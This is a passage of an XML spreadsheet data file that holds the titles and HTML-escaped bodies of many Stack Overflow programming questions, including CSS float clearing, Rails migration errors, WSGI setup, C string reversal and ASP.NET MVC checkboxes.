    <t xml:space="preserve">&lt;p&gt;Although elements like &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;s normally grow to fit their contents, using the &lt;code&gt;float&lt;/code&gt; property can cause a startling problem for CSS newbies: &lt;strong&gt;if floated elements have non-floated parent elements, the parent will collapse.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 1&amp;lt;/div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 2&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The parent div in this example will &lt;strong&gt;not expand&lt;/strong&gt; to contain its floated children - it will appear to have &lt;code&gt;height: 0&lt;/code&gt;.&lt;/p&gt;
&lt;h1&gt;How do you solve this problem?&lt;/h1&gt;
&lt;p&gt;&lt;em&gt;I would like to create an exhaustive list of solutions here. If you're aware of cross-browser compatibility issues, please point them out.&lt;/em&gt;  &lt;/p&gt;
&lt;h2&gt;Solution 1&lt;/h2&gt;
&lt;p&gt;Float the parent.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="float: left;"&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 1&amp;lt;/div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 2&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Semantic code.&lt;br /&gt;
&lt;strong&gt;Cons&lt;/strong&gt;: You may not always want the parent floated. Even if you do, do you float the parents' parent, and so on? Must you float every ancestor element?&lt;/p&gt;
&lt;h2&gt;Solution 2&lt;/h2&gt;
&lt;p&gt;Give the parent an explicit height.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="height: 300px;"&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 1&amp;lt;/div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 2&amp;lt;/div&amp;gt;        
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Semantic code.&lt;br /&gt;
&lt;strong&gt;Cons&lt;/strong&gt;: Not flexible - if the content changes or the browser is resized, the layout will break.&lt;/p&gt;
&lt;h2&gt;Solution 3&lt;/h2&gt;
&lt;p&gt;Append a "spacer" element inside the parent element, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 1&amp;lt;/div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 2&amp;lt;/div&amp;gt;
    &amp;lt;div class="spacer" style="clear: both;"&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Straightforward to code.&lt;br /&gt;
&lt;strong&gt;Cons&lt;/strong&gt;: Not semantic; the spacer div exists only as a layout hack.&lt;/p&gt;
&lt;h2&gt;Solution 4&lt;/h2&gt;
&lt;p&gt;Set parent to &lt;code&gt;overflow: auto&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="overflow: auto;"&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 1&amp;lt;/div&amp;gt;
    &amp;lt;div style="float: left;"&amp;gt;Div 2&amp;lt;/div&amp;gt;        
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Doesn't require extra div.&lt;br /&gt;
&lt;strong&gt;Cons&lt;/strong&gt;: Seems like a hack - that's not the &lt;code&gt;overflow&lt;/code&gt; property's stated purpose.&lt;/p&gt;
&lt;h1&gt;Comments? Other suggestions?&lt;/h1&gt;
</t>
  </si>
  <si>
    <t>How can I open a port in iptables for RMI access</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to connect from my Java application to a development server that has port 8088 closed which is used for RMI. I appreciate any help on how to open that port.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting Virus Scanners</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've had problems with a virus scanner murdering the performance of our app by slowing down writes to an &lt;a href="http://en.wikipedia.org/wiki/H2_(DBMS)" rel="nofollow"&gt;H2 db&lt;/a&gt;. So we'd like to be able to detect the presence of any virus scanner and alert the user of the potential problem. It would be part of a problem detection retue that would alert users to known performance factors specific to their systems.&lt;/p&gt;
&lt;p&gt;The current suggestion is a write test that displays the warning if a disk write takes an unreasonable amount of time. That does get to the actual problem, but not to the cause. So, is there any reliable and direct way to detect virus protection, one that doesn't rely on indirect effects? We might end up doing both, but it would be nice to be curtain in our 'suggestions'.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Python web frameworks, WSGI and CGI fit together</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;a href="http://en.wikipedia.org/wiki/Bluehost"&gt;Bluehost&lt;/a&gt; account where I can run Python scripts as CGI. I guess it's the simplest CGI, because to run I have to define the following in &lt;code&gt;.htaccess&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Options +ExecCGI
AddType text/html py
AddHandler cgi-script .py
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, whenever I look up web programming with Python, I hear a lot about WSGI and how most frameworks use it. But I just don't understand how it all fits together, especially when my web server is given (Apache running at a host's machine) and not something I can really play with (except defining &lt;code&gt;.htaccess&lt;/code&gt; commands).&lt;/p&gt;
&lt;p&gt;How are &lt;a href="http://en.wikipedia.org/wiki/Web_Server_Gateway_Interface"&gt;WSGI&lt;/a&gt;, CGI, and the frameworks all connected? What do I need to know, install, and do if I want to run a web framework (say &lt;a href="http://webpy.org/"&gt;web.py&lt;/a&gt; or &lt;a href="http://en.wikipedia.org/wiki/CherryPy"&gt;CherryPy&lt;/a&gt;) on my basic CGI configuration? How to install WSGI support?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Protected Mode Keyboard Access on x86 Assembly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on keyboard input for a very basic kernel that I'm developing and I'm completely stuck. I can't seem to find any information online that can show me the information I need to know.&lt;/p&gt;
&lt;p&gt;My kernel is running in protected mode right now, so I can't use the real mode keyboard routines without jumping into real mode and back, which I'm trying to avoid. I want to be able to access my keyboard from protected mode. Does anyone know how to do this? The only thing I have found so far is that it involves talking to the controller directly using in/out ports, but beyond that I'm stumped. This is, of course, is not something that comes up very often. Normally, Assembly tutorials assume you're running an operating system underneath.&lt;/p&gt;
&lt;p&gt;I'm very new to the x86 assembly, so  I'm just looking for some good resources for working with the standard hardware from protected mode. I'm compiling the Assembly source code with NASM and linking it to the C source code compiled with DJGPP. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you change the colors of the text when doing a Schema Compare in Visual Studio 2008 Database Edition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to find out how to modify the &lt;code&gt;Colors/Fonts&lt;/code&gt; used in the Schema Compare "&lt;code&gt;Object Definitions&lt;/code&gt;" window that appears after a comparison is done between two databases.&lt;/p&gt;
&lt;p&gt;The color scheme I have is unreadable, but I cannot seem to find the right settings in the &lt;code&gt;Tools/Options/Environment/Fonts&lt;/code&gt; and &lt;code&gt;Colors&lt;/code&gt; dialog.&lt;/p&gt;
&lt;p&gt;Thanks for any help.&lt;/p&gt;
&lt;p&gt;Jason&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rake db:migration aborted</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a unfinished project that a developer just didn't finish and didn't leave any documentation about the installation process. I've downloaded the production directory to my windows machine (running InstantRails 2), I created the databases as required in the &lt;code&gt;database.yml&lt;/code&gt; and I tried to run the &lt;code&gt;rake:db:migrate --trace&lt;/code&gt; but I'm receiving the following error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(in D:/projects/broke2)
** Invoke db:migrate (first_time)
** Invoke environment (first_time)
** Execute environment
** Execute db:migrate
rake aborted!
uninitialized constant Admin
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/dependencies.rb:279:in `load_missing_constant'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/dependencies.rb:468:in `const_missing'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/dependencies.rb:480:in `const_missing'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/inflector.rb:285:in `constantize'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/inflector.rb:284:in `each'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/inflector.rb:284:in `constantize'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/core_ext/string/inflections.rb:143:in `constantize'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:481:in `migrations'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/connection_adapters/mysql_adapter.rb:15:in `inject'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:465:in `each'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:465:in `inject'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:465:in `migrations'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:431:in `migrate'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:373:in `up'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/activerecord-2.1.1/lib/active_record/migration.rb:356:in `migrate'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rails-2.1.1/lib/tasks/databases.rake:99
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:617:in `call'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:617:in `execute'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:612:in `each'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:612:in `execute'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:578:in `invoke_with_call_chain'
D:/InstantRails-2.0-win/ruby/lib/ruby/1.8/monitor.rb:242:in `synchronize'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:571:in `invoke_with_call_chain'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:564:in `invoke'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:2019:in `invoke_task'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1997:in `top_level'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1997:in `each'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1997:in `top_level'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:2036:in `standard_exception_handling'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1991:in `top_level'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1970:in `run'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:2036:in `standard_exception_handling'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake.rb:1967:in `run'
D:/InstantRails-2.0-win/ruby/lib/ruby/gems/1.8/gems/rake-0.8.3/bin/rake:31
D:/InstantRails-2.0-win/ruby/bin/rake:19:in `load'
D:/InstantRails-2.0-win/ruby/bin/rake:19
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm a regular Rails developer (it's not my first app) but I never saw this error and I don't have a clue where to start to debug.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you upgrade a web site that uses #include files to a Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently inherited a fairly large web site. The project is set up as a web site in Visual studio, and not a Web Application. For a number of reasons, I would like to convert it to a web application.&lt;/p&gt;
&lt;p&gt;I started converting the application using these directions from Scott Gu: &lt;a href="http://webproject.scottgu.com/CSharp/Migration2/Migration2.aspx" rel="nofollow"&gt;Migrating a VS 2005 Web Site Project to VS 2005 Web Application Project&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;While doing the conversion I discovered that this web site uses a ton of #include directives to include other .aspx files. The main problem with this is that currently each code-behind file directly calls controls (using this.) from the pages it is including. &lt;/p&gt;
&lt;p&gt;This behavior seems to be allowed by the way that the compiler dynamically creates the .designer files in memory at compile time.&lt;/p&gt;
&lt;p&gt;The problem is that since I'm converting the application to a Web Application, I'm creating physical versions of the .designer files. Now the same call to controls on the included pages (using this.), no longer work.&lt;/p&gt;
&lt;p&gt;I've tried a few things to try and remedy this:&lt;/p&gt;
&lt;p&gt;First, I noticed that the .aspx include files didn't have a @ Page directive, so I tried adding one. This prevented the app from compiling because the main page now had multiple @page directives.&lt;/p&gt;
&lt;p&gt;Second, I tried to just rename the included .aspx files to .inc, but I still have the same problem of the main page no longer being able to access the controls as they could before.&lt;/p&gt;
&lt;p&gt;Anyone ever done this before and have any thoughts on how to proceed without changing the entire structure of the web site?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;edit: I decided not to go through with the conversion at this time simply because any benefits gained wouldn't be worth the trouble. Thanks for the help.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you improve this algorithm? (c string reversal)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working through some programming interview challenges I found online, I had to write an algorithm to reverse a const char * and return a pointer to a new char *. I think I have it, but to make it work properly I had to do some wonky stuff - basically having to account for the null-terminating character myself. Somehow I feel this is wrong, but I'm stumped, and I was wondering if someone could help me out:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char * reverse(const char * str)
{
  int length = strlen(str);
  char * reversed_string = new char[length+1];
  for(int i = 0; i &amp;lt; length; ++i)
  {
    reversed_string[i] = str[(length-1) - i];
  }
  //need to null terminate the string
  reversed_string[length] = '\0';
  return reversed_string;
}
int main(int argc, char * argv[])
{
  char * rev_str = reverse("Testing");
  cout &amp;lt;&amp;lt; "Your string reversed is this: " &amp;lt;&amp;lt; rev_str &amp;lt;&amp;lt; endl;
  delete rev_str;
  rev_str = 0;
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it possible to view the history of a line in SVN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/53629/history-of-changes-to-a-particular-line-of-code-in-subversion"&gt;History of changes to a particular line of code in Subversion?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Using SVN and/or Tortoise SVN (or any other SVN tool, really), is it possible to view the history for a specific line of a file?&lt;/p&gt;
&lt;p&gt;Recently I've had several occurrences of coming across a line in a file and wanting to find the log entry associated with its creation (either to determine how old the line of code was, or to get a larger context for why it was added).&lt;/p&gt;
&lt;p&gt;Right now I'm doing this by hand.  I can display the log for the file, go back a ways, and see if the line in question is present.  If it is, I go back further.  If it isn't, I go look at a more recent revision.  Repeat until the revision where the change was made is found.&lt;/p&gt;
&lt;p&gt;Needless to say, this process is awkward at best, especially for particularly old files.  Does anyone know of an automated method of accomplishing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross-Platform Way of Creating Safari Webarchives</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been searching around and haven't found any reference to tools that can create Safari's webarchive format.&lt;/p&gt;
&lt;p&gt;Does anyone have pointers to code for creating this format, or at least a format reference documentation?&lt;/p&gt;
&lt;p&gt;Ideally I'd like to build a tool that takes a directory and splits out a webarchive, for loading into a iPhone.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should you collect the young generation first in a full garbage collection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a program that contains a generational garbage collector. There are just two generations. What I wonder is: When doing a full collection, do I gain anything (performance-wise) by first collecting the younger objects, promoting the survivors to the old generation, and then collecting the old generation, or should I just garbage collect everything in one sweep? I'm not sure which way people usually do it.&lt;/p&gt;
&lt;p&gt;I'm using the two-step method now, since it was a bit simpler to implement, but perhaps a one-step method would be more efficient?&lt;/p&gt;
&lt;p&gt;The garbage collector is non-copying, if that matters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I calculate the SIZE of stored procedures in SQL Server 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was asked for a comprehensive breakdown on space used within a specific database. 
I know I can use *sys.dm_db_partition_stats* in SQL Server 2005 to figure out how much space each &lt;em&gt;table&lt;/em&gt; in a database is using, but is there any way to determine the individual and total size of the &lt;em&gt;stored procedures&lt;/em&gt; in a database? (Short of opening each one and counting the characters, of course.)&lt;/p&gt;
&lt;p&gt;Total space used by stored procs is not likely to be significant (compared to actual &lt;em&gt;data&lt;/em&gt;), but with hundreds of them, it could add up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to localize an IEnumerable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to localize a collection (IEnumerable)?
From the BL I retrieve a collection of entities which still need to localized, I figured I write a method which extends the IEnumerable and returns the localized list. &lt;/p&gt;
&lt;p&gt;How can i get the code underneath working? Any ideas? Maybe better options?    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static IEnumerable Localize(this IEnumerable items, CultureInfo cultureInfo)
{
    foreach(string item in items)
    {
        /*Error underneath, cannot assign to item*/
        item = ResourceHelper.GetString(item, cultureInfo);
    }
    return (items);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Dealing with C++ "initialized but not referenced" warning for destruction of scope helpers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Visual Studio, I often use objects only for RAII purposes.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ScopeGuard close_guard = MakeGuard( &amp;amp;close_file, file );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The whole purpose of *close_guard* is to make sure that the file will be close on function exit, it is not used anywhere else.  However, Visual Studio gives me a warning that a "&lt;em&gt;local variable is initialized but not referenced&lt;/em&gt;".  I want to turn this warning off for this specific case.&lt;/p&gt;
&lt;p&gt;How do you deal with this kind of situation?  Visual Studio thinks that this object is useless, but this is wrong since it has a non-trivial destructor.&lt;/p&gt;
&lt;p&gt;I wouldn't want to use a &lt;em&gt;#pragma warning&lt;/em&gt; directive for this since it would turn off this warning even for legitimate reasons.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert memory address range in running Linux process to symbols in object file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is a snippet of the file &lt;em&gt;/proc/self/smaps&lt;/em&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00af8000-00b14000 r-xp 00000000 fd:00 16417      /lib/ld-2.8.so
Size:                112 kB
Rss:                  88 kB
Pss:                   1 kB
Shared_Clean:         88 kB
Shared_Dirty:          0 kB
Private_Clean:         0 kB
Private_Dirty:         0 kB
Referenced:           88 kB
Swap:                  0 kB
00b14000-00b15000 r--p 0001c000 fd:00 16417      /lib/ld-2.8.so
Size:                  4 kB
Rss:                   4 kB
Pss:                   4 kB
Shared_Clean:          0 kB
Shared_Dirty:          0 kB
Private_Clean:         0 kB
Private_Dirty:         4 kB
Referenced:            4 kB
Swap:                  0 kB
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It shows that this process &lt;em&gt;(self)&lt;/em&gt; is linked to &lt;em&gt;/lib/ld-2.8.so&lt;/em&gt; and two (of the many) byte ranges mapped into memory.&lt;/p&gt;
&lt;p&gt;The first range of 88kb (22 4kb pages) is &lt;em&gt;shared&lt;/em&gt; and &lt;em&gt;clean&lt;/em&gt;, that is it has not been written to. This is probably code.&lt;/p&gt;
&lt;p&gt;The second range of 4kb (a single page) is not shared and it is &lt;em&gt;dirty&lt;/em&gt; -- the process has written to it since it was memory mapped from the file on disk. This is probably data.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;But what is in that memory?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How do you convert the memory range &lt;em&gt;00b14000-00b15000&lt;/em&gt; into useful information such as the line number of the file in which a large static structure is declared?&lt;/p&gt;
&lt;p&gt;The technique will need to take account of &lt;a href="http://en.wikipedia.org/wiki/Prelinking" rel="nofollow"&gt;prelinking&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization" rel="nofollow"&gt;address space randomization&lt;/a&gt;, such as from &lt;a href="http://en.wikipedia.org/wiki/ExecShield" rel="nofollow"&gt;execshield&lt;/a&gt;, and also &lt;a href="http://fedoraproject.org/wiki/StackTraces" rel="nofollow"&gt;separate debugging symbols&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(The motivation is to identify popular libraries which also create dirty memory and to fix them, for example by by declaring structures const).&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WordPress: I got rid of the second "home" page, but it's not good enough</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WordPress site (2.6.2) in which I have set the Home page to a static page instead of the normal posts page. The ID of this page is 2, so in the WordPress template I have changed the &lt;code&gt;wp_list_pages&lt;/code&gt; to look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php wp_list_pages('exclude=2&amp;amp;title_li=&amp;amp;depth=1' ); ?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this works fine, but now the Home page doesn't get "lit up" when it's selected (because in fact it's page_id 2 that is selected, and it doesn't show in the menu). Is there any easy way around this?&lt;/p&gt;
&lt;p&gt;If not, in broad outlines, what's the hard way around this? Make my own version of the &lt;code&gt;wp_list_pages&lt;/code&gt; function?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does a Poco to DataSet project exist?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;POCO&lt;/code&gt; object that goes 4 levels deep contained objects (like &lt;code&gt;Invoice&lt;/code&gt; has line items that have taxes that have gl entries), and I want to turn the entire thing into a &lt;code&gt;DataSet&lt;/code&gt;. So there would be 4 tables, each with constraints being applied to the parent table.&lt;/p&gt;
&lt;p&gt;Does anyone know of something that would automated this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do you put program scope variables in UI driven application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so I know that global variables are considered bad, and the singleton pattern is overused.  And I have read in many places that a class should do only one task and contain only those variables that allow it to accomplish that one task. However, while working on my latest project, I actually thought about these rules before writing any code and have noticed that I tend to break them at the very beginning of the program.  &lt;/p&gt;
&lt;p&gt;I'm currently working on an MFC dialog based application, but this question could be applied to any UI driven application.  I have separate classes that handle state machines, file reading/writing, and hardware interfacing.  All of these objects will need some type of UI control or property display/editing.  In the MFC dialog applications, the dialog is the program, so it must exist until the program is closed.  I've usually just put the objects in the main dialog class for the application and had the dialog class serve double duty; as both the main UI and the home for all other objects in the application.  In other applications, I've created these objects globally and referenced them from wherever they were needed.  Neither of these ways seem correct.  The first option breaks the one class, one task rule, and the second relies on globals and also creates hidden dependencies.  I could institute some type of dependency injection, but where would all these variables that I would inject reside?&lt;/p&gt;
&lt;p&gt;I'm just wondering what others do to organize their programs without breaking the rules?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to handle checkboxes in ASP.NET MVC forms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Caution:  This question is over five years old!&lt;/h2&gt;
&lt;p&gt;Your best option is to search for newer questions, or to search the answers below looking for your specific version of MVC, as many answers here are obsolete now.  &lt;/p&gt;
&lt;p&gt;If you do find an answer that works for your version, please make sure the answer contains the version of MVC you are using.&lt;br&gt;
&lt;sub&gt;&lt;sub&gt;(The original question starts below)&lt;/sub&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;This seems a bit bizarre to me, but as far as I can tell, this is how you do it.&lt;/p&gt;
&lt;p&gt;I have a collection of objects, and I want users to select one or more of them.  This says to me "form with checkboxes."  My objects don't have any concept of "selected" (they're rudimentary POCO's formed by deserializing a wcf call).  So, I do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class SampleObject{
  public Guid Id {get;set;}
  public string Name {get;set;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the view:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%
    using (Html.BeginForm())
    {
%&amp;gt;
  &amp;lt;%foreach (var o in ViewData.Model) {%&amp;gt;
    &amp;lt;%=Html.CheckBox(o.Id)%&amp;gt;&amp;amp;nbsp;&amp;lt;%= o.Name %&amp;gt;
  &amp;lt;%}%&amp;gt;
  &amp;lt;input type="submit" value="Submit" /&amp;gt;
&amp;lt;%}%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And, in the controller, this is the only way I can see to figure out what objects the user checked:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ActionResult ThisLooksWeird(FormCollection result)
{
  var winnars = from x in result.AllKeys
          where result[x] != "false"
          select x;
  // yadda
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Its freaky in the first place, and secondly, for those items the user checked, the FormCollection lists its value as "true false" rather than just true.  &lt;/p&gt;
&lt;p&gt;Obviously, I'm missing something.  I think this is built with the idea in mind that the objects in the collection that are acted upon within the html form are updated using &lt;code&gt;UpdateModel()&lt;/code&gt; or through a ModelBinder.  &lt;/p&gt;
&lt;p&gt;But my objects aren't set up for this; does that mean that this is the only way?  Is there another way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to get as much as possible from dbx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do TDD on a daily basis for my C++ development on Solaris10. It has greatly reduced the time I have to spend using my debugger but sometime this is the only option.&lt;/p&gt;
&lt;p&gt;DBX is pretty powerful but not that user friendly. Note that I'm talking about console DBX not the SunStudio GUI for DBX).&lt;/p&gt;
&lt;p&gt;What are the best productivity tips you can give for dbx C++ debugging?&lt;/p&gt;
&lt;p&gt;PS. Changing debugger is not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I enable double-buffering of a control using C# (Windows forms)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I enable double-buffering of a control using C# (Windows forms)?&lt;/p&gt;
&lt;p&gt;I have a panel control which I am drawing stuff into and also an owner-drawn tab control. Both suffer from flicker, so how can I enable double-buffering?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A good Java library for network math</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a Java library that is geared towards network math and already tested.  Nothing particularly fancy, just something to hold ips and subnets, and do things like print a subnet mask or calculate whether an IP is within a given subnet.  &lt;/p&gt;
&lt;p&gt;Should I roll my own, or is there already a robust library for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C# why can't a conditional operator implicitly cast to a nullable type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am curious as to why an implicit cast fails in...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int? someValue = SomeCondition ? ResultOfSomeCalc() : null;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and why I have to perform an explicit cast instead&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int? someValue = SomeCondition ? ResultofSomeCalc() : (int?)null;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems to me that the compiler has all the information it need to make an implicit casting decision, no?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check SQL replication status via T-SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to check the status of a publication and subscription in SQL Server 2008 T-SQL.  I want to be able to determine if its okay, when was the last successful, sync, etc.. Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to avoid screen flickering when showing form with user drawn controls?</t>
  </si>
  <si>
